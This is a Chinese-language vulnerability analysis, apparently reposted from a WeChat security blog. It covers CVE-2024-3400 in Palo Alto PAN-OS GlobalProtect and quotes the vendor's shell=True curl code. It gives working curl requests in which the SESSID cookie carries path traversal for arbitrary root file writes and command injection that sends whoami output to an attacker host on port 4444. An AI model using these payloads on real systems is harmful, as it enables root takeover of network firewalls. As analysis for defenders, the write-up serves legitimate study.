0x01 漏洞描述
0x02 漏洞分析
def send_file(logger, dbg, fname, dest_ip, key, signedUrl, capath):
source_ip_str = get_source_ip(logger,dbg)
if source_ip_str is not None and source_ip_str != "":
curl_cmd = "/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "%s" --data-binary @%s --capath %s --interface %s"
%(signedUrl, fname, capath, source_ip_str)
else:
curl_cmd = "/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "%s" --data-binary @%s --capath %s"
%(signedUrl, fname, capath)
if dbg:
logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
"""call shell-command and either return its output or kill it
if it doesn't normally exit within timeout seconds"""
# Define dosys specific constants here
PANSYS_POST_SIGKILL_RETRY_COUNT = 5
# how long to pause between poll-readline-readline cycles
PANSYS_DOSYS_PAUSE = 0.1
# Use first_wait if time to complete is lengthy and can be estimated
if first_wait == None:
first_wait = PANSYS_DOSYS_PAUSE
# restrict the maximum possible dosys timeout
PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
# Can support upto 2GB per stream
out = StringIO()
err = StringIO()
try:
if shell:
cmd = command
else:
cmd = command.split()
except AttributeError: cmd = command
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
我们可以看到命令字符串是通过subprocess.Popen执行的。shell参数将为True。这是不安全的,因为命令字符串将在Linux shell的上下文中执行,因此可以访问shell功能,如backtick、pipes、重定向等,非常适合执行攻击者控制的输入。
任意文件创建
web服务器为未经身份验证的会话设置SESSID cookie,与会话cookie关联的数据位于/tmp/sslvpn中。
curl https://hostname/global-protect/login.esp-k-H“Cookie:SESSSID=test_data”
检查session目录,确认我们的数据已写入!
$ ls -lha /tmp/sslvpn/session_test_data
-rw------- 1 root root 0 Apr 15 12:50 session_test_data
测试发现,通过目录穿越,可以完全避免session_前缀,从而导致任意的空文件写入。请求类型可以是GET或POST,只要它是对有效端点的结构正确的HTTPS请求即可。
curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../hello_as_root'
$ ls -lha /hello_as_root
-rw------- 1 root root 0 Apr 15 12:55 hello_as_root
命令注入
curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}attacker:4444?user=$(whoami)`'
经过短暂的等待,我们可以建立远程代码执行:
$ ps auxfw
[..]
/usr/bin/python -t /usr/local/bin/dt_curl -i 35.184.126.116 -f /opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}attacker:4444?user=$(whoami)`'
在攻击者机器上,Python web服务器收到一个GET请求,表明我们的代码是用root权限执行的。
python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
192.168.50.226 - - [15/Apr/2024 19:00:17] "GET /?user=root HTTP/1.1" 200 -
0x03 影响版本
0x04 漏洞详情
https://security.paloaltonetworks.com/CVE-2024-3400
0x05 参考链接
https://security.paloaltonetworks.com/CVE-2024-3400
CVE-2024-3400 (英语) |攻击者KB (attackerkb.com)
Palo Alto - 将 Protecc 纳入 GlobalProtect (CVE-2024-3400) (watchtowr.com)
原文始发于微信公众号(山石网科安全技术研究院):Palo Alto Networks PAN-OS 命令注入漏洞分析(CVE-2024-3400)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论